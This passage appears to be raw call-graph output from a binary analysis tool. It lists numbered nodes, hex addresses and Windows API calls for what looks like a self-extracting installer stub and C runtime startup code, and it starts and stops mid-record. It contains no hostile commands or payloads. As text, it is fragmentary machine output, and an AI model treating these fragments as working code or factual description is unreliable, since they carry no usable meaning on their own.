Concurrency::cancel_current_task 23867->23868 23869 f12cd9 23867->23869 23867->23874 23911 f2157a RaiseException 23868->23911 23909 f12b7b 75 API calls 3 library calls 23869->23909 23873 f12dc1 23874->23846 23876 f0aa95 23875->23876 23878 f0aa9f 23875->23878 23877 f1e24a new 8 API calls 23876->23877 23877->23878 23878->23848 23880 f092f0 __EH_prolog 23879->23880 23912 f07dc6 23880->23912 23883 f0709d 76 API calls 23884 f09302 23883->23884 23915 f0ca6c 23884->23915 23886 f0935c 23886->23856 23887 f0ca6c 114 API calls 23889 f09314 23887->23889 23889->23886 23889->23887 23924 f0cc51 97 API calls __vswprintf_c_l 23889->23924 23890->23838 23891->23858 23892->23841 23894 f0c9b2 23893->23894 23895 f0c9c4 23893->23895 23925 f06249 80 API calls 23894->23925 23926 f06249 80 API calls 23895->23926 23898 f0c9bc 23898->23843 23899->23856 23900->23858 23902 f11ad9 23901->23902 23903 f11af2 23902->23903 23906 f11b06 23902->23906 23927 f1075b 84 API calls 23903->23927 23905 f11af9 23905->23906 23907->23838 23908->23865 23909->23874 23910->23868 23911->23873 23913 f0acf5 GetVersionExW 23912->23913 23914 f07dcb 23913->23914 23914->23883 23921 f0ca82 __vswprintf_c_l 23915->23921 23916 f0cbf7 23917 f0cc1f 23916->23917 23918 f0ca0b 6 API calls 23916->23918 23919 f1067c SetThreadExecutionState RaiseException 23917->23919 23918->23917 23920 f0cbee 23919->23920 23920->23889 23921->23916 23921->23920 23922 f184bd 99 API calls 23921->23922 23923 f0ab70 89 API calls 23921->23923 23922->23921 23923->23921 23924->23889 23925->23898 23926->23898 23927->23905 23928->23654 23929->23654 23930->23655 23932 f05e4a 23931->23932 23976 f05d67 23932->23976 23935 f05e7d 23936 f05eb5 23935->23936 23981 f0ad65 CharUpperW CompareStringW 23935->23981 23936->23668 23938 f08289 23937->23938 23987 f1179d CharUpperW 23938->23987 23940 f08333 23940->23671 23942 f07d7b 23941->23942 23943 f07dbb 23942->23943 23988 f07043 74 API calls 23942->23988 23943->23678 23945 f07db3 23989 f06dc1 74 API calls 23945->23989 23947->23731 23949 f09d73 23948->23949 23952 f09d82 23948->23952 23950 f09d79 FlushFileBuffers 23949->23950 23949->23952 23950->23952 23951 f09dfb SetFileTime 23951->23736 23952->23951 23953->23659 23954->23662 23955->23667 23956->23678 23957->23678 23958->23676 23959->23691 23960->23684 23961->23691 23963 f09992 GetFileType 23962->23963 23964 f0998f 23962->23964 23965 f099a0 23963->23965 23964->23698 23965->23698 23966->23701 23967->23703 23968->23704 23969->23727 23970->23727 23971->23727 23972->23727 23973->23727 23974->23733 23975->23739 23982 f05c64 23976->23982 23978 f05d88 23978->23935 23980 f05c64 2 API calls 23980->23978 23981->23935 23985 f05c6e 23982->23985 23983 f05d56 23983->23978 23983->23980 23985->23983 23986 f0ad65 CharUpperW CompareStringW 23985->23986 23986->23985 23987->23940 23988->23945 23989->23943 23991 f0c8db 23990->23991 23996 f0a90e 84 API calls 23991->23996 23993 f0c90d 23997 f0a90e 84 API calls 23993->23997 23995 f0c918 23996->23993 23997->23995 23999 f0a5fe 23998->23999 24000 f0a691 FindNextFileW 23999->24000 24001 f0a621 FindFirstFileW 23999->24001 24002 f0a6b0 24000->24002 24003 f0a69c GetLastError 24000->24003 24004 f0a638 24001->24004 24009 f0a675 24001->24009 24002->24009 24003->24002 24005 f0b66c 2 API calls 24004->24005 24006 f0a64d 24005->24006 24007 f0a651 FindFirstFileW 24006->24007 24008 f0a66a GetLastError 24006->24008 24007->24008 24007->24009 24008->24009 24009->23605 24019 f19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24010->24019 24012 f19d21 24013 f19d2d 24012->24013 24020 f19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24012->24020 24013->23354 24013->23355 24015->23360 24016->23364 24017->23364 24018->23367 24019->24012 24020->24013 24021->23373 24023 f09ef7 76 API calls 24022->24023 24024 f01f5b 24023->24024 24025 f019a6 97 API calls 24024->24025 24028 f01f78 24024->24028 24026 f01f68 24025->24026 24026->24028 24029 f06dc1 74 API calls 24026->24029 24028->23381 24028->23382 24029->24028 24876 f1b8e0 92 API calls _swprintf 24877 f18ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24880 f316e0 CloseHandle 24882 f1acd0 99 API calls 24926 f119d0 26 API calls std::bad_exception::bad_exception 24037 f1ead2 24038 f1eade CallCatchBlock 24037->24038 24063 f1e5c7 24038->24063 24040 f1eae5 24042 f1eb0e 24040->24042 24143 f1ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24040->24143 24050 f1eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24042->24050 24074 f2824d 24042->24074 24046 f1eb2d CallCatchBlock 24047 f1ebad 24082 f1f020 24047->24082 24050->24047 24144 f27243 38 API calls 3 library calls 24050->24144 24058 f1ebd9 24059 f1ebe2 24058->24059 24145 f2764a 28 API calls _abort 24058->24145 24146 f1e73e 13 API calls 2 library calls 24059->24146 24064 f1e5d0 24063->24064 24147 f1ed5b IsProcessorFeaturePresent 24064->24147 24066 f1e5dc 24148 f22016 24066->24148 24068 f1e5e1 24073 f1e5e5 24068->24073 24157 f280d7 24068->24157 24071 f1e5fc 24071->24040 24073->24040 24077 f28264 24074->24077 24075 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24076 f1eb27 24075->24076 24076->24046 24078 f281f1 24076->24078 24077->24075 24079 f28220 24078->24079 24080 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24079->24080 24081 f28249 24080->24081 24081->24050 24207 f1f350 24082->24207 24085 f1ebb3 24086 f2819e 24085->24086 24209 f2b290 24086->24209 24088 f1ebbc 24091 f1d5d4 24088->24091 24090 f281a7 24090->24088 24213 f2b59a 38 API calls 24090->24213 24348 f100cf 24091->24348 24095 f1d5f3 24397 f1a335 24095->24397 24097 f1d5fc 24401 f113b3 GetCPInfo 24097->24401 24099 f1d606 ___scrt_fastfail 24100 f1d619 GetCommandLineW 24099->24100 24101 f1d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24100->24101 24102 f1d628 24100->24102 24103 f0400a _swprintf 51 API calls 24101->24103 24404 f1bc84 24102->24404 24105 f1d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24103->24105 24415 f1aded LoadBitmapW 24105->24415 24108 f1d6a0 24409 f1d287 24108->24409 24109 f1d636 OpenFileMappingW 24112 f1d696 CloseHandle 24109->24112 24113 f1d64f MapViewOfFile 24109->24113 24112->24101 24115 f1d660 __vswprintf_c_l 24113->24115 24116 f1d68d UnmapViewOfFile 24113->24116 24119 f1d287 2 API calls 24115->24119 24116->24112 24122 f1d67c 24119->24122 24121 f18835 8 API calls 24123 f1d76a DialogBoxParamW 24121->24123 24122->24116 24124 f1d7a4 24123->24124 24125 f1d7b6 Sleep 24124->24125 24126 f1d7bd 24124->24126 24125->24126 24127 f1d7cb 24126->24127 24445 f1a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24126->24445 24129 f1d7ea DeleteObject 24127->24129 24130 f1d806 24129->24130 24131 f1d7ff DeleteObject 24129->24131 24132 f1d837 24130->24132 24133 f1d849 24130->24133 24131->24130 24446 f1d2e6 6 API calls 24132->24446 24442 f1a39d 24133->24442 24136 f1d83d CloseHandle 24136->24133 24137 f1d883 24138 f2757e GetModuleHandleW 24137->24138 24139 f1ebcf 24138->24139 24139->24058 24140 f276a7 24139->24140 24580 f27424 24140->24580 24143->24040 24144->24047 24145->24059 24146->24046 24147->24066 24149 f2201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24148->24149 24161 f2310e 24149->24161 24153 f22031 24154 f2203c 24153->24154 24175 f2314a DeleteCriticalSection 24153->24175 24154->24068 24156 f22029 24156->24068 24203 f2b73a 24157->24203 24160 f2203f 8 API calls 3 library calls 24160->24073 24162 f23117 24161->24162 24164 f23140 24162->24164 24165 f22025 24162->24165 24176 f23385 24162->24176 24181 f2314a DeleteCriticalSection 24164->24181 24165->24156 24167 f2215c 24165->24167 24196 f2329a 24167->24196 24169 f22166 24174 f22171 24169->24174 24201 f23348 6 API calls try_get_function 24169->24201 24171 f2217f 24172 f2218c 24171->24172 24202 f2218f 6 API calls ___vcrt_FlsFree 24171->24202 24172->24153 24174->24153 24175->24156 24182 f23179 24176->24182 24179 f233a8 24179->24162 24180 f233bc InitializeCriticalSectionAndSpinCount 24180->24179 24181->24165 24183 f231a9 24182->24183 24184 f231ad 24182->24184 24183->24184 24185 f231cd 24183->24185 24189 f23219 24183->24189 24184->24179 24184->24180 24185->24184 24187 f231d9 GetProcAddress 24185->24187 24188 f231e9 __crt_fast_encode_pointer 24187->24188 24188->24184 24190 f23241 LoadLibraryExW 24189->24190 24193 f23236 24189->24193 24191 f23275 24190->24191 24192 f2325d GetLastError 24190->24192 24191->24193 24194 f2328c FreeLibrary 24191->24194 24192->24191 24195 f23268 LoadLibraryExW 24192->24195 24193->24183 24194->24193 24195->24191 24197 f23179 try_get_function 5 API calls 24196->24197 24198 f232b4 24197->24198 24199 f232cc TlsAlloc 24198->24199 24200 f232bd 24198->24200 24200->24169 24201->24171 24202->24174 24206 f2b753 24203->24206 24204 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24205 f1e5ee 24204->24205 24205->24071 24205->24160 24206->24204 24208 f1f033 GetStartupInfoW 24207->24208 24208->24085 24210 f2b2a2 24209->24210 24211 f2b299 24209->24211 24210->24090 24214 f2b188 24211->24214 24213->24090 24215 f28fa5 _GetRangeOfTrysToCheck 38 API calls 24214->24215 24216 f2b195 24215->24216 24234 f2b2ae 24216->24234 24218 f2b19d 24243 f2af1b 24218->24243 24221 f2b1b4 24221->24210 24222 f28518 __vsnwprintf_l 21 API calls 24223 f2b1c5 24222->24223 24224 f2b1f7 24223->24224 24250 f2b350 24223->24250 24227 f284de _free 20 API calls 24224->24227 24227->24221 24228 f2b1f2 24260 f2895a 20 API calls __dosmaperr 24228->24260 24230 f2b23b 24230->24224 24261 f2adf1 26 API calls 24230->24261 24231 f2b20f 24231->24230 24232 f284de _free 20 API calls 24231->24232 24232->24230 24235 f2b2ba CallCatchBlock 24234->24235 24236 f28fa5 _GetRangeOfTrysToCheck 38 API calls 24235->24236 24241 f2b2c4 24236->24241 24238 f2b348 CallCatchBlock 24238->24218 24241->24238 24242 f284de _free 20 API calls 24241->24242 24262 f28566 38 API calls _abort 24241->24262 24263 f2a3f1 EnterCriticalSection 24241->24263 24264 f2b33f LeaveCriticalSection _abort 24241->24264 24242->24241 24244 f23dd6 __fassign 38 API calls 24243->24244 24245 f2af2d 24244->24245 24246 f2af4e 24245->24246 24247 f2af3c GetOEMCP 24245->24247 24248 f2af53 GetACP 24246->24248 24249 f2af65 24246->24249 24247->24249 24248->24249 24249->24221 24249->24222 24251 f2af1b 40 API calls 24250->24251 24252 f2b36f 24251->24252 24254 f2b3e5 ___scrt_fastfail 24252->24254 24256 f2b3c0 IsValidCodePage 24252->24256 24258 f2b376 24252->24258 24253 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24255 f2b1ea 24253->24255 24265 f2aff4 GetCPInfo 24254->24265 24255->24228 24255->24231 24257 f2b3d2 GetCPInfo 24256->24257 24256->24258 24257->24254 24257->24258 24258->24253 24260->24224 24261->24224 24263->24241 24264->24241 24271 f2b02e 24265->24271 24274 f2b0d8 24265->24274 24268 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24270 f2b184 24268->24270 24270->24258 24275 f2c099 24271->24275 24273 f2a275 __vsnwprintf_l 43 API calls 24273->24274 24274->24268 24276 f23dd6 __fassign 38 API calls 24275->24276 24277 f2c0b9 MultiByteToWideChar 24276->24277 24279 f2c0f7 24277->24279 24286 f2c18f 24277->24286 24281 f2c118 __vsnwprintf_l ___scrt_fastfail 24279->24281 24282 f28518 __vsnwprintf_l 21 API calls 24279->24282 24280 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24283 f2b08f 24280->24283 24284 f2c189 24281->24284 24287 f2c15d MultiByteToWideChar 24281->24287 24282->24281 24289 f2a275 24283->24289 24294 f2a2c0 20 API calls _free 24284->24294 24286->24280 24287->24284 24288 f2c179 GetStringTypeW 24287->24288 24288->24284 24290 f23dd6 __fassign 38 API calls 24289->24290 24291 f2a288 24290->24291 24295 f2a058 24291->24295 24294->24286 24297 f2a073 __vsnwprintf_l 24295->24297 24296 f2a099 MultiByteToWideChar 24298 f2a0c3 24296->24298 24299 f2a24d 24296->24299 24297->24296 24302 f28518 __vsnwprintf_l 21 API calls 24298->24302 24304 f2a0e4 __vsnwprintf_l 24298->24304 24300 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24299->24300 24301 f2a260 24300->24301 24301->24273 24302->24304 24303 f2a12d MultiByteToWideChar 24305 f2a146 24303->24305 24321 f2a199 24303->24321 24304->24303 24304->24321 24322 f2a72c 24305->24322 24309 f2a170 24313 f2a72c __vsnwprintf_l 11 API calls 24309->24313 24309->24321 24310 f2a1a8 24311 f2a1c9 __vsnwprintf_l 24310->24311 24312 f28518 __vsnwprintf_l 21 API calls 24310->24312 24314 f2a23e 24311->24314 24315 f2a72c __vsnwprintf_l 11 API calls 24311->24315 24312->24311 24313->24321 24330 f2a2c0 20 API calls _free 24314->24330 24317 f2a21d 24315->24317 24317->24314 24318 f2a22c WideCharToMultiByte 24317->24318 24318->24314 24319 f2a26c 24318->24319 24332 f2a2c0 20 API calls _free 24319->24332 24331 f2a2c0 20 API calls _free 24321->24331 24333 f2a458 24322->24333 24325 f2a75c 24328 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24325->24328 24327 f2a79c LCMapStringW 24327->24325 24329 f2a15d 24328->24329 24329->24309 24329->24310 24329->24321 24330->24321 24331->24299 24332->24321 24334 f2a484 24333->24334 24335 f2a488 24333->24335 24334->24335 24337 f2a4a8 24334->24337 24341 f2a4f4 24334->24341 24335->24325 24340 f2a7b4 10 API calls 3 library calls 24335->24340 24337->24335 24338 f2a4b4 GetProcAddress 24337->24338 24339 f2a4c4 __crt_fast_encode_pointer 24338->24339 24339->24335 24340->24327 24342 f2a515 LoadLibraryExW 24341->24342 24347 f2a50a 24341->24347 24343 f2a532 GetLastError 24342->24343 24344 f2a54a 24342->24344 24343->24344 24345 f2a53d LoadLibraryExW 24343->24345 24346 f2a561 FreeLibrary 24344->24346 24344->24347 24345->24344 24346->24347 24347->24334 24349 f1e360 24348->24349 24350 f100d9 GetModuleHandleW 24349->24350 24351 f100f0 GetProcAddress 24350->24351 24352 f10154 24350->24352 24354 f10121 GetProcAddress 24351->24354 24357 f10109 24351->24357 24353 f10484 GetModuleFileNameW 24352->24353 24456 f270dd 42 API calls 2 library calls 24352->24456 24368 f104a3 24353->24368 24354->24352 24358 f10133 24354->24358 24356 f103be 24356->24353 24359 f103c9 GetModuleFileNameW CreateFileW 24356->24359 24357->24354 24358->24352 24360 f10478 CloseHandle 24359->24360 24361 f103fc SetFilePointer 24359->24361 24360->24353 24361->24360 24362 f1040c ReadFile 24361->24362 24362->24360 24364 f1042b 24362->24364 24364->24360 24367 f10085 2 API calls 24364->24367 24366 f104d2 CompareStringW 24366->24368 24367->24364 24368->24366 24369 f10508 GetFileAttributesW 24368->24369 24370 f10520 24368->24370 24447 f0acf5 24368->24447 24450 f10085 24368->24450 24369->24368 24369->24370 24371 f1052a 24370->24371 24373 f10560 24370->24373 24374 f10542 GetFileAttributesW 24371->24374 24376 f1055a 24371->24376 24372 f1066f 24396 f19da4 GetCurrentDirectoryW 24372->24396 24373->24372 24375 f0acf5 GetVersionExW 24373->24375 24374->24371 24374->24376 24377 f1057a 24375->24377 24376->24373 24378 f10581 24377->24378 24379 f105e7 24377->24379 24381 f10085 2 API calls 24378->24381 24380 f0400a _swprintf 51 API calls 24379->24380 24382 f1060f AllocConsole 24380->24382 24383 f1058b 24381->24383 24384 f10667 ExitProcess 24382->24384 24385 f1061c GetCurrentProcessId AttachConsole 24382->24385 24386 f10085 2 API calls 24383->24386 24457 f235b3 24385->24457 24388 f10595 24386->24388 24390 f0ddd1 53 API calls 24388->24390 24389 f1063d GetStdHandle WriteConsoleW Sleep FreeConsole 24389->24384 24391 f105b0 24390->24391 24392 f0400a _swprintf 51 API calls 24391->24392 24393 f105c3 24392->24393 24394 f0ddd1 53 API calls 24393->24394 24395 f105d2 24394->24395 24395->24384 24396->24095 24398 f10085 2 API calls 24397->24398 24399 f1a349 OleInitialize 24398->24399 24400 f1a36c GdiplusStartup SHGetMalloc 24399->24400 24400->24097 24402 f113d7 IsDBCSLeadByte 24401->24402 24402->24402 24403 f113ef 24402->24403 24403->24099 24408 f1bc8e 24404->24408 24405 f1bda4 24405->24108 24405->24109 24407 f1179d CharUpperW 24407->24408 24408->24405 24408->24407 24459 f0ecad 80 API calls ___scrt_fastfail 24408->24459 24410 f1e360 24409->24410 24411 f1d294 SetEnvironmentVariableW 24410->24411 24413 f1d2b7 24411->24413 24412 f1d2df 24412->24101 24413->24412 24414 f1d2d3 SetEnvironmentVariableW 24413->24414 24414->24412 24416 f1ae0e 24415->24416 24420 f1ae15 24415->24420 24460 f19e1c FindResourceW 24416->24460 24417 f1ae1b GetObjectW 24418 f1ae2a 24417->24418 24421 f19d1a 4 API calls 24418->24421 24420->24417 24420->24418 24422 f1ae3d 24421->24422 24423 f1ae80 24422->24423 24424 f1ae5c 24422->24424 24425 f19e1c 12 API calls 24422->24425 24434 f0d31c 24423->24434 24474 f19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24424->24474 24427 f1ae4d 24425->24427 24427->24424 24429 f1ae53 DeleteObject 24427->24429 24428 f1ae64 24475 f19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24428->24475 24429->24424 24431 f1ae6d 24476 f19f5d 8 API calls ___scrt_fastfail 24431->24476 24433 f1ae74 DeleteObject 24433->24423 24485 f0d341 24434->24485 24436 f0d328 24525 f0da4e GetModuleHandleW FindResourceW 24436->24525 24439 f18835 24440 f1e24a new 8 API calls 24439->24440 24441 f18854 24440->24441 24441->24121 24443 f1a3cc GdiplusShutdown OleUninitialize 24442->24443 24443->24137 24445->24127 24446->24136 24448 f0ad09 GetVersionExW 24447->24448 24449 f0ad45 24447->24449 24448->24449 24449->24368 24451 f1e360 24450->24451 24452 f10092 GetSystemDirectoryW 24451->24452 24453 f100c8 24452->24453 24454 f100aa 24452->24454 24453->24368 24455 f100bb LoadLibraryW 24454->24455 24455->24453 24456->24356 24458 f235bb 24457->24458 24458->24389 24458->24458 24459->24408 24461 f19e70 24460->24461 24462 f19e3e SizeofResource 24460->24462 24461->24420 24462->24461 24463 f19e52 LoadResource 24462->24463 24463->24461 24464 f19e63 LockResource 24463->24464 24464->24461 24465 f19e77 GlobalAlloc 24464->24465 24465->24461 24466 f19e92 GlobalLock 24465->24466 24467 f19f21 GlobalFree 24466->24467 24468 f19ea1 __vswprintf_c_l 24466->24468 24467->24461 24469 f19f1a GlobalUnlock 24468->24469 24477 f19d7b GdipAlloc 24468->24477 24469->24467 24472 f19f05 24472->24469 24473 f19eef GdipCreateHBITMAPFromBitmap 24473->24472 24474->24428 24475->24431 24476->24433 24478 f19d8d 24477->24478 24479 f19d9a 24477->24479 24481 f19b0f 24478->24481 24479->24469 24479->24472 24479->24473 24482 f19b30 GdipCreateBitmapFromStreamICM 24481->24482 24483 f19b37 GdipCreateBitmapFromStream 24481->24483 24484 f19b3c 24482->24484 24483->24484 24484->24479 24486 f0d34b _wcschr __EH_prolog 24485->24486 24487 f0d37a GetModuleFileNameW 24486->24487 24488 f0d3ab 24486->24488 24489 f0d394 24487->24489 24527 f099b0 24488->24527 24489->24488 24491 f09653 79 API calls 24493 f0d7ab 24491->24493 24492 f0d407 24538 f25a90 26 API calls 3 library calls 24492->24538 24493->24436 24494 f13781 76 API calls 24496 f0d3db 24494->24496 24496->24492 24496->24494 24510 f0d627 24496->24510 24497 f0d41a 24539 f25a90 26 API calls 3 library calls 24497->24539 24499 f0d563 24499->24510 24557 f09d30 77 API calls 24499->24557 24503 f0d57d new 24504 f09bf0 80 API calls 24503->24504 24503->24510 24507 f0d5a6 new 24504->24507 24506 f0d42c 24506->24499 24506->24510 24540 f09e40 24506->24540 24548 f09bf0 24506->24548 24556 f09d30 77 API calls 24506->24556 24509 f0d5b2 new 24507->24509 24507->24510 24558 f1137a MultiByteToWideChar 24507->24558 24509->24510 24511 f0d72b 24509->24511 24513 f0da0a 24509->24513 24516 f0d9fa 24509->24516 24522 f11596 WideCharToMultiByte 24509->24522 24562 f0dd6b 50 API calls __vsnprintf 24509->24562 24563 f258d9 26 API calls 3 library calls 24509->24563 24510->24491 24559 f0ce72 76 API calls 24511->24559 24564 f0ce72 76 API calls 24513->24564 24514 f0d742 24517 f0d771 24514->24517 24521 f13781 76 API calls 24514->24521 24516->24436 24560 f25a90 26 API calls 3 library calls 24517->24560 24519 f0d78b 24561 f25a90 26 API calls 3 library calls 24519->24561 24521->24514 24522->24509 24526 f0d32f 24525->24526 24526->24439 24528 f099ba 24527->24528 24529 f09a39 CreateFileW 24528->24529 24530 f09a59 GetLastError 24529->24530 24531 f09aaa 24529->24531 24532 f0b66c 2 API calls 24530->24532 24533 f09ae1 24531->24533 24535 f09ac7 SetFileTime 24531->24535 24534 f09a79 24532->24534 24533->24496 24534->24531 24536 f09a7d CreateFileW GetLastError 24534->24536 24535->24533 24537 f09aa1 24536->24537 24537->24531 24538->24497 24539->24506 24541 f09e53 24540->24541 24542 f09e64 SetFilePointer 24540->24542 24545 f09e9d 24541->24545 24565 f06fa5 75 API calls 24541->24565 24543 f09e82 GetLastError 24542->24543 24542->24545 24543->24545 24546 f09e8c 24543->24546 24545->24506 24546->24545 24566 f06fa5 75 API calls 24546->24566 24550 f09bfc 24548->24550 24553 f09c03 24548->24553 24550->24506 24551 f09c9e 24551->24550 24579 f06f6b 75 API calls 24551->24579 24553->24550 24553->24551 24554 f09cc0 24553->24554 24567 f0984e 24553->24567 24554->24550 24555 f0984e 5 API calls 24554->24555 24555->24554 24556->24506 24557->24503 24558->24509 24559->24514 24560->24519 24561->24510 24562->24509 24563->24509 24564->24516 24565->24542 24566->24545 24568 f09867 ReadFile 24567->24568 24569 f0985c GetStdHandle 24567->24569 24570 f09880 24568->24570 24574 f098a0 24568->24574 24569->24568 24571 f09989 GetFileType 24570->24571 24572 f09887 24571->24572 24573 f098a8 GetLastError 24572->24573 24575 f098b7 24572->24575 24576 f09895 24572->24576 24573->24574 24573->24575 24574->24553 24575->24574 24577 f098c7 GetLastError 24575->24577 24578 f0984e GetFileType 24576->24578 24577->24574 24577->24576 24578->24574 24579->24550 24581 f27430 _GetRangeOfTrysToCheck 24580->24581 24582 f2757e _abort GetModuleHandleW 24581->24582 24590 f27448 24581->24590 24584 f2743c 24582->24584 24584->24590 24614 f275c2 GetModuleHandleExW 24584->24614 24585 f274ee 24603 f2752e 24585->24603 24589 f274c5 24594 f274dd 24589->24594 24598 f281f1 _abort 5 API calls 24589->24598 24602 f2a3f1 EnterCriticalSection 24590->24602 24591 f27450 24591->24585 24591->24589 24622 f27f30 20 API calls _abort 24591->24622 24592 f27537 24623 f31a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24592->24623 24593 f2750b 24606 f2753d 24593->24606 24599 f281f1 _abort 5 API calls 24594->24599 24598->24594 24599->24585 24602->24591 24624 f2a441 LeaveCriticalSection 24603->24624 24605 f27507 24605->24592 24605->24593 24625 f2a836 24606->24625 24609 f2756b 24612 f275c2 _abort 8 API calls 24609->24612 24610 f2754b GetPEB 24610->24609 24611 f2755b GetCurrentProcess TerminateProcess 24610->24611 24611->24609 24613 f27573 ExitProcess 24612->24613 24615 f2760f 24614->24615 24616 f275ec GetProcAddress 24614->24616 24617 f27615 FreeLibrary 24615->24617 24618 f2761e 24615->24618 24621 f27601 24616->24621 24617->24618 24619 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24618->24619 24620 f27628 24619->24620 24620->24590 24621->24615 24622->24589 24624->24605 24626 f2a85b 24625->24626 24630 f2a851 24625->24630 24627 f2a458 __dosmaperr 5 API calls 24626->24627 24627->24630 24628 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24629 f27547 24628->24629 24629->24609 24629->24610 24630->24628 24631 f010d5 24636 f05bd7 24631->24636 24637 f05be1 __EH_prolog 24636->24637 24638 f0b07d 82 API calls 24637->24638 24639 f05bed 24638->24639 24645 f05dcc GetCurrentProcess GetProcessAffinityMask 24639->24645 24883 f1eac0 27 API calls pre_c_initialization 24930 f197c0 10 API calls 24885 f29ec0 21 API calls 24931 f2b5c0 GetCommandLineA GetCommandLineW 24886 f1a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24932 f2ebc1 21 API calls __vsnwprintf_l 24887 f016b0 84 API calls 24676 f290b0 24684 f2a56f 24676->24684 24679 f290c4 24681 f290cc 24682 f290d9 24681->24682 24692 f290e0 11 API calls 24681->24692 24685 f2a458 __dosmaperr 5 API calls 24684->24685 24686 f2a596 24685->24686 24687 f2a5ae TlsAlloc 24686->24687 24688 f2a59f 24686->24688 24687->24688 24689 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24688->24689 24690 f290ba 24689->24690 24690->24679 24691 f29029 20 API calls 2 library calls 24690->24691 24691->24681 24692->24679 24693 f2a3b0 24694 f2a3bb 24693->24694 24696 f2a3e4 24694->24696 24697 f2a3e0 24694->24697 24699 f2a6ca 24694->24699 24706 f2a410 DeleteCriticalSection 24696->24706 24700 f2a458 __dosmaperr 5 API calls 24699->24700 24701 f2a6f1 24700->24701 24702 f2a70f InitializeCriticalSectionAndSpinCount 24701->24702 24705 f2a6fa 24701->24705 24702->24705 24703 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24704 f2a726 24703->24704 24704->24694 24705->24703 24706->24697 24888 f21eb0 6 API calls 3 library calls 24936 f279b7 55 API calls _free 24709 f276bd 24710 f276e8 24709->24710 24711 f276cc 24709->24711 24712 f2b290 51 API calls 24710->24712 24711->24710 24713 f276d2 24711->24713 24715 f276ef GetModuleFileNameA 24712->24715 24732 f2895a 20 API calls __dosmaperr 24713->24732 24717 f27713 24715->24717 24716 f276d7 24733 f28839 26 API calls pre_c_initialization 24716->24733 24734 f277e1 38 API calls 24717->24734 24720 f27730 24735 f27956 20 API calls 2 library calls 24720->24735 24722 f2773d 24723 f27752 24722->24723 24724 f27746 24722->24724 24737 f277e1 38 API calls 24723->24737 24736 f2895a 20 API calls __dosmaperr 24724->24736 24727 f284de _free 20 API calls 24729 f276e1 24727->24729 24728 f27768 24730 f284de _free 20 API calls 24728->24730 24731 f2774b 24728->24731 24730->24731 24731->24727 24732->24716 24733->24729 24734->24720 24735->24722 24736->24731 24737->24728 24890 f096a0 79 API calls 24939 f2e9a0 51 API calls 24893 f1e4a2 38 API calls 2 library calls 24756 f1d891 19 API calls ___delayLoadHelper2@8 24894 f17090 114 API calls 24895 f1cc90 69 API calls 24941 f1a990 96 API calls 24942 f19b90 GdipCloneImage GdipAlloc 24943 f29b90 21 API calls 2 library calls 24944 f22397 48 API calls 24759 f1d997 24760 f1d89b 24759->24760 24761 f1df59 ___delayLoadHelper2@8 19 API calls 24760->24761 24761->24760 24898 f0ea98 FreeLibrary 24899 f1a89d 78 API calls 24946 f25780 QueryPerformanceFrequency QueryPerformanceCounter 24807 f01385 82 API calls 3 library calls 22915 f1d573 22916 f1d580 22915->22916 22923 f0ddd1 22916->22923 22934 f0ddff 22923->22934 22926 f0400a 22957 f03fdd 22926->22957 22929 f1ac74 PeekMessageW 22930 f1acc8 22929->22930 22931 f1ac8f GetMessageW 22929->22931 22932 f1aca5 IsDialogMessageW 22931->22932 22933 f1acb4 TranslateMessage DispatchMessageW 22931->22933 22932->22930 22932->22933 22933->22930 22940 f0d28a 22934->22940 22937 f0de22 LoadStringW 22938 f0ddfc 22937->22938 22939 f0de39 LoadStringW 22937->22939 22938->22926 22939->22938 22945 f0d1c3 22940->22945 22942 f0d2a7 22943 f0d2bc 22942->22943 22953 f0d2c8 26 API calls 22942->22953 22943->22937 22943->22938 22946 f0d1de 22945->22946 22952 f0d1d7 _strncpy 22945->22952 22948 f0d202 22946->22948 22954 f11596 WideCharToMultiByte 22946->22954 22951 f0d233 22948->22951 22955 f0dd6b 50 API calls __vsnprintf 22948->22955 22956 f258d9 26 API calls 3 library calls 22951->22956 22952->22942 22953->22943 22954->22948 22955->22951 22956->22952 22958 f03ff4 ___scrt_initialize_default_local_stdio_options 22957->22958 22961 f25759 22958->22961 22964 f23837 22961->22964 22965 f23877 22964->22965 22966 f2385f 22964->22966 22965->22966 22967 f2387f 22965->22967 22988 f2895a 20 API calls __dosmaperr 22966->22988 22990 f23dd6 22967->22990 22969 f23864 22989 f28839 26 API calls pre_c_initialization 22969->22989 22973 f2386f 22981 f1ec4a 22973->22981 22976 f03ffe SetDlgItemTextW 22976->22929 22977 f23907 22999 f24186 51 API calls 4 library calls 22977->22999 22979 f23912 23000 f23e59 20 API calls _free 22979->23000 22982 f1ec53 22981->22982 22983 f1ec55 IsProcessorFeaturePresent 22981->22983 22982->22976 22985 